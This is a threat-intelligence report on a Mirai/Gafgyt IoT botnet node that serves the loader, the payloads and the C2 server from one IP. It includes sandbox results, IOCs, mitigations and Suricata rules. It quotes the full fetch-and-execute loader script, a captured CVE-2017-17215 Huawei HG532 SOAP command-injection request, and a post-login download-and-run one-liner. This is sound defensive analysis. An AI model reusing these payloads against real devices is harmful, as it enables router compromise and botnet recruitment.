Mirai/Gafgyt multi-arch loader — 94.183.232.247
One self-hosted node serving loader, payloads, and command-and-control for over a month — CVE-2017-17215 exploitation confirmed, live C2 channel confirmed in sandbox, no commands observed
Executive summary
Most IoT botnet infrastructure we see splits the job three ways: one host delivers the exploit, a second serves the payloads, a third runs command-and-control. This one doesn't bother. A single IP, 94.183.232.247, has spent over a month as the exploit target, the loader, the payload host, and the C2 endpoint all at once — and it's still doing all four jobs as of this writing.
94.183.232.247, spanning 10 CPU architectures behind a classic Mirai-style bins.sh multi-fallback loader script. Delivery came from at least two distinct vectors: a Huawei HG532 router RCE (CVE-2017-17215) observed once directly against a lure sensor — the captured request shows no login step preceding it — and plain post-login shell commands following what looks like credential brute force. We independently detonated 20 of these samples (10 architectures × 2 recent seeding waves) in an automated 12-hour sandbox. All 20 confirmed a live TCP connection to 94.183.232.247:6772 — a non-standard port, not HTTP or DNS — but 9 of them sat connected and silent for the entire 12-hour window with no command ever pushed.
VirusTotal classifies every architecture we submitted as a Mirai/Gafgyt hybrid (33–38 of 62–64 engines flagging each sample), consistent with a commodity IoT DDoS botnet rather than a novel family. We found no public write-up naming this specific node or loader; RDAP shows the netblock was registered under a Hong Kong-registered entity on 2025-10-15, well before this loader activity began.
Threat actor profile
No named threat actor or public campaign write-up was found matching this node's binary-naming convention, loader script, or C2 port. The operator has not been attributed.
bins.sh loader (no packing, no sandbox-evasion checks observed in the script itself), points to a lower-effort, opportunistic operation rather than a resilience-conscious one. The multiple distinct binary-naming waves served from the same IP over the observed month — an uppercase set (ARMV7L, I586, ...), a differently-prefixed set (CRY.arm, CRY.mips, ...), and a lowercase set (arm, mips, ...) — suggest either one operator repeatedly rebuilding the same loader, or the host being reused/shared across more than one loader deployment.
| Attribute | Assessment | Confidence |
|---|---|---|
| Motivation | Consistent with DDoS botnet recruitment (Mirai/Gafgyt lineage per VT classification); no DDoS tasking was directly observed in our sandbox runs | MED |
| Sophistication | Low-to-intermediate — classic unobfuscated shell loader, no packing observed, but broad 10-architecture coverage and a working self-hosted C2 | HIGH |
| Attribution | Unknown; no named threat actor or public research found referencing this IP or loader naming pattern | MED |
| Target profile | Opportunistic IoT/router devices — at least one confirmed Huawei HG532 RCE exploit, plus generic SSH/Telnet-reachable Linux hosts across 10 CPU architectures (ARM, Intel x86, MIPS LE/BE, SH4, x86-64, M68K, PowerPC, SPARC, ARC) | HIGH |
| Operational tempo | Recurring re-seeding roughly every few days across a full month of observation, with two dense seeding waves (2026-06-30 and 2026-07-03) in the most recent week | HIGH |
Infrastructure analysis
chmod +x + execute, per architectureDistribution host
94.183.232.247. An automated open-directory probe against the host returned HTTP 200 with 14 listed files. Separately, the captured loader script itself contains 14 architecture-fetch lines (10 CPU architectures, with ARM and Intel x86 each split across multiple sub-variant filenames). We can't confirm the directory listing and the script's fetch list are the identical 14 files — the probe records a count, not filenames — but the two numbers landing on the same figure is a reasonable coincidence given the loader is the thing populating that directory.
| Attribute | Value |
|---|---|
| IP | 94.183.232.247 |
| Netblock (RDAP) | 94.183.232.0/24, name CloudBackbone |
| Registrant (RDAP) | CGI GLOBAL LIMITED (Hong Kong); abuse contact CloudBackbone NOC (Estonia) |
| Netblock registered | 2025-10-15; last changed 2025-12-11 (per live RDAP query) |
| Roles observed | Exploit target for CVE-2017-17215 delivery; loader + payload distribution (open directory, 14 files); C2 on port 6772 |
| Open directory | HTTP 200, 14 items listed at probe time |
Malware analysis
Loader script (Ciabins.sh)
POSIX/bash, ~1.7–2.0 KB depending on capture (4 distinct hashes captured across the observed month — same structure, presumably rebuilt or re-templated between waves). No sandbox-evasion or anti-analysis logic was found in the script itself; it is a straightforward multi-directory, multi-architecture fetch-and-run loop:
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/MIPS; chmod +x MIPS; ./MIPS; rm -rf MIPS
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/MIPSEL; chmod +x MIPSEL; ./MIPSEL; rm -rf MIPSEL
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/SH4; chmod +x SH4; ./SH4; rm -rf SH4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/X86_64; chmod +x X86_64; ./X86_64; rm -rf X86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/I686; chmod +x I686; ./I686; rm -rf I686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/POWERPC; chmod +x POWERPC; ./POWERPC; rm -rf POWERPC
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/I586; chmod +x I586; ./I586; rm -rf I586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/M68K; chmod +x M68K; ./M68K; rm -rf M68K
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/SPARC; chmod +x SPARC; ./SPARC; rm -rf SPARC
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/ARMV4L; chmod +x ARMV4L; ./ARMV4L; rm -rf ARMV4L
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/ARMV5L; chmod +x ARMV5L; ./ARMV5L; rm -rf ARMV5L
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/ARMV6L; chmod +x ARMV6L; ./ARMV6L; rm -rf ARMV6L
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/ARMV7L; chmod +x ARMV7L; ./ARMV7L; rm -rf ARMV7L
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/ARC; chmod +x ARC; ./ARC; rm -rf ARC
Each line tries five fallback working directories in order, then fetches, marks executable, runs, and deletes a single architecture's binary before moving to the next — the textbook Mirai bins.sh shape. Directly-captured shell commands (not routed through this script) also fetched individual architectures on their own, e.g. cd /tmp;rm -rf ARMV7L; wget http://94.183.232.247/ARMV7L; chmod 777 ARMV7L; ./ARMV7L bww — the trailing bww argument is passed to the binary on every directly-observed command and is likely a botnet/build tag rather than a functional flag.
VirusTotal — one submission per architecture
We submitted one representative sample per architecture from the most recent seeding wave (2026-07-03) for classification. All six returned a live scan within the session:
| Architecture | SHA256 | VT Detections | Classification |
|---|---|---|---|
| ARM (v7) | c62a539e…913cea |
35 / 62 | trojan.mirai/gafgyt |
| Intel x86 (i686) | c1af9c6d…5ba543277 |
38 / 64 | trojan.mirai/gafgyt |
| MIPS (LE) | a34d7aa8…25a00f5df |
36 / 63 | trojan.mirai/gafgyt |
| MIPS (BE) | a3e695c3…6c72ba58e3b |
33 / 62 | trojan.gafgyt/mirai |
| Renesas SH4 | 5b4faea9…f6440eab |
37 / 64 | trojan.mirai/gafgyt |
| x86-64 | 8e189738…131ea5b521d9 |
37 / 63 | trojan.mirai/gafgyt |
The blended mirai/gafgyt label (and its reversed gafgyt/mirai variant on the MIPS-BE sample) reflects the two families' well-documented shared code lineage rather than any ambiguity introduced by this loader — commodity engines routinely can't cleanly separate the two on IoT ELF payloads.
Behavioral sandboxing (tria.ge)
We submitted the same six samples to tria.ge for dynamic analysis. Results varied sharply by architecture, which is itself informative:
| Architecture | tria.ge Result | Score | Notable Signatures / IOCs |
|---|---|---|---|
| ARM (v7) | 260705-d5ltcag17y | 7 | Writes DNS resolver configuration; changes its process name; connects to 94.183.232.247 |
| Intel x86 (i686) | 260705-d5mqmscx5r | 7 | Same DNS-config-write + process-rename signatures; connects to 94.183.232.247 |
| MIPS (LE) | 260705-d5nmyacx6j | 7 | Above signatures, plus a tagged System Network Configuration Discovery (T1016) behavior; connects to 94.183.232.247 |
| MIPS (BE) | 260705-d5pj8scx6l | 1 | Behavioral run crashed (SIGSEGV in the emulated MIPS-BE sandbox); no runtime signal captured |
| Renesas SH4 | 260705-d5p6rsg17z | 1 | All four attempted sandbox backends (x86_64/ARM/MIPS-BE/MIPS-LE hosts) failed with exec format error or a crash — tria.ge has no native SH4 execution backend |
| x86-64 | 260705-d5q33ag171 | 7 | DNS-config-write + process-rename signatures; connects to 94.183.232.247 |
The four samples that ran successfully (ARM, x86, MIPS-LE, x86-64) all independently connected outbound to 94.183.232.247 and wrote to the DNS resolver configuration — consistent behavior across otherwise-unrelated CPU architectures, which is exactly what a shared codebase compiled for multiple targets should produce. The two failures (MIPS-BE, SH4) are sandbox emulation gaps, not evidence about the malware itself — our own detonation pipeline, which uses purpose-built QEMU images per architecture rather than a general-purpose behavioral sandbox, successfully booted and executed all of these architectures (see below).
Sandbox detonation
Our own automated pipeline runs captured ELF samples in per-architecture QEMU images with monitored network egress, initially for a short window and then, if a live outbound connection persists, for a full 12-hour dwell. Two recent seeding waves from this host — 2026-06-30 and 2026-07-03 — produced 20 unique samples across 10 architectures that our sandbox images support (ARMv4–v7, Intel i586/i686, MIPS LE/BE, Renesas SH4, x86-64). Three architectures the loader also serves — M68K, PowerPC, and SPARC — were captured but have no corresponding sandbox image, so they were not detonated.
94.183.232.247:6772 — a non-standard TCP port, not HTTP or DNS. 9 of 20 ran for the full 12-hour dwell budget with the connection held open and silent the entire time (exit_kind: c2_silent_bail, our pipeline's label for "connected, then nothing"); a further 2 of 20 ran the full 12 hours and exited normally without ever bailing on silence. The remaining runs were shorter (300-second) initial passes, most reaped by the sandbox's own timeout rather than any bot or C2 action. Across every detonation, in every run where our process tracer captured syscall activity, the sample opened /etc/resolv.conf and issued a connect on port 53 as part of its own runtime setup — consistent with the DNS-configuration-write behavior tria.ge flagged independently above — before or alongside the connection to port 6772.
| Exit outcome | Count | Typical run length | Notes |
|---|---|---|---|
c2_silent_bail | 9 | 12 hours (43,200s) | Connected to 6772, zero bytes exchanged after connect, ran to full dwell budget |
exited | 2 | 1 × 300s, 1 × 12 hours | Ran to completion without a silence-triggered bail |
killed / kill | 18 | 300 seconds | Short initial-pass runs, reaped by the sandbox's own timeout |
exit | 1 | 300 seconds | Short initial-pass run |
We treat the 9 fully-silent 12-hour sessions as confirmation that 94.183.232.247:6772 is a live, reachable C2 endpoint — not dead or sinkholed infrastructure — but not as evidence of active tasking during our observation window. It's consistent with either a C2 that pushes commands on a schedule we didn't catch, one gated on a check-in we don't perform, or simply an operator who wasn't actively directing this particular batch of bots during the ~30 hours our dwells covered.
Observed TTPs — MITRE ATT&CK
NewStatusURL, captured once directly against a lure sensorCiabins.sh loader and directly-captured one-line wget; chmod; ./binary commandswget fetch of the loader script and per-architecture ELF payloads, all from the same host94.183.232.247:6772 — not HTTP or DNS; protocol content not decoded, connection held silent in every sandbox runActivity timeline
94.183.232.247 registered (per live RDAP query), predating all observed loader activity by roughly 8 months../ARMV7L bww) on one sensor. Within minutes, the fleet's chase pipeline independently retrieves all 13 architecture binaries plus Ciabins.sh from the same host.CRY.<arch> and lowercase <arch>), plus standalone re-fetches of Ciabins.sh — a new distinct file hash each time.Ciabins.sh fetch-and-execute command via the SOAP NewStatusURL field.Ciabins.sh hash (14 items) captured within roughly 12 minutes.94.183.232.247:6772 for the entire window, the last completing at 06:02 UTC on 07-04.Exploit payload
CVE-2017-17215 — Huawei HG532 SOAP/UPnP RCE
CVE-2017-17215 is a command-injection vulnerability (CVSS 3.0: 8.8 HIGH) in the Huawei HG532 home router's UPnP SOAP service (port 37215), publicly associated with the Satori/Okiru Mirai variant's mass-exploitation wave in 2017. It remains a staple exploitation vector for commodity IoT botnets nearly a decade later. NVD's formal scoring lists a low privilege requirement, but the request we captured shows no preceding authentication step, consistent with how this CVE is exploited in the wild via the device's exposed UPnP interface. The captured request, decoded from the raw SOAP body:
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(cd /tmp;rm -rf Ciabins.sh;wget http://94.183.232.247/Ciabins.sh;chmod +x Ciabins.sh)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
The command injection rides in the NewStatusURL field of a WANPPPConnection:1 Upgrade SOAP action, a well-documented shape for this CVE. The NewDownloadURL field's literal string HUAWEIUPNP is the CVE's canonical fingerprint marker, not a functional command.
Direct post-login command (credential brute force path)
Separately from the CVE, four sessions across four sensors captured this exact one-line command typed directly after a successful login:
cd /tmp;rm -rf ARMV7L; wget http://94.183.232.247/ARMV7L; chmod 777 ARMV7L; ./ARMV7L bww
This is the same distribution host, a different delivery path — no exploit is needed once an attacker already has a shell, which is consistent with credential brute force rather than a second CVE.
Indicators of compromise
Network IOCs
ARMV7L, I686, ...), CRY.<arch>, and lowercase naming waves all observed/ctrlt/DeviceUpgrade_1File IOCs — detonated samples (2026-07-03 wave, one per architecture)
| SHA256 | Architecture | Size | VT |
|---|---|---|---|
c62a539ef0b524d81b3379a21d52f1b1799f39be30c107abb80c91159c913cea | ARM (v7) | 141,628 B | 35/62 |
c1af9c6d656ba5b94c4a5a4f3e0bf58fa507df0a92772fa2242c67e5ba543277 | Intel x86 (i686) | 91,320 B | 38/64 |
a34d7aa860ddd60d571be3eb9b0c0a75a00d76a7285892ae66eaf3d25a00f5df | MIPS (LE) | 170,436 B | 36/63 |
a3e695c3a15b52b59c86875a9a5c47c0f932186b8433bb70ab4aa6c72ba58e3b | MIPS (BE) | 170,436 B | 33/62 |
5b4faea96a95e9d448af8710a08e959eb6c0e01af9af630f50ec8417f6440eab | Renesas SH4 | 107,944 B | 37/64 |
8e1897382a75baf8d62f21fc5266e64d06fbc1bd5e209d0f1d35131ea5b521d9 | x86-64 | 98,280 B | 37/63 |
These six are one representative per architecture from the most recent (2026-07-03) seeding wave. The remaining 14 detonated samples (four more ARM sub-variants and a matching set from the 2026-06-30 wave) share the same loader host, C2 endpoint, and VT classification pattern.
Mitigations and detection
| Action | Priority | Detail |
|---|---|---|
| Patch or retire CVE-2017-17215-affected devices | HIGH | Huawei HG532 devices with UPnP exposed to the Internet should be patched, firewalled, or replaced — this vulnerability is nearly a decade old and still being actively exploited. |
| Block distribution/C2 host | HIGH | Block outbound traffic to 94.183.232.247 on all ports, particularly TCP/6772. |
Restrict outbound wget/tftp on IoT/embedded devices |
MED | Devices that don't need general Internet fetch capability should have it removed or firewalled at the network edge. |
| Alert on unexpected outbound TCP to non-standard high ports | MED | A long-lived, low-traffic TCP session on an unusual port (e.g. 6772) from an IoT/embedded device is a strong C2 indicator even without decoded protocol content. |
Detection signatures
# Suricata/Snort — CVE-2017-17215 Huawei HG532 SOAP RCE attempt
alert http any any -> $HOME_NET any (msg:"CVE-2017-17215 Huawei HG532 SOAP RCE attempt"; \
content:"/ctrlt/DeviceUpgrade_1"; http_uri; \
content:"NewStatusURL"; http_client_body; \
content:"WANPPPConnection"; http_client_body; \
flow:established,to_server; sid:9930001; rev:1;)
# Suricata/Snort — loader payload delivery
alert http any any -> any any (msg:"Mirai/Gafgyt multi-arch loader download"; \
content:"Ciabins.sh"; http_uri; \
flow:established,to_server; sid:9930002; rev:1;)
# Suricata — outbound C2 beacon, non-standard port
alert tcp $HOME_NET any -> 94.183.232.247 6772 (msg:"Mirai/Gafgyt multi-arch loader C2 beacon"; \
flow:established,to_server; sid:9930003; rev:1;)
Collection methodology
All data in this report was collected organically by a distributed SSH/Telnet honeypot fleet deployed across multiple cloud providers and geographic regions. Fleet nodes also run alternate-protocol lure daemons that capture exploitation attempts against commonly-targeted embedded-device services beyond SSH/Telnet, including the SOAP/UPnP endpoint used by CVE-2017-17215.
Captured payloads were fetched automatically by the fleet's ingest pipeline shortly after first observation. A subset covering every CPU architecture the sandbox supports was detonated in isolated, per-architecture QEMU environments with monitored network egress; no interaction with victim networks occurred beyond passive observation of traffic the samples themselves generated. VirusTotal and tria.ge lookups were performed via the fleet's own investigation tooling; RDAP data was queried live against the public RDAP bootstrap service.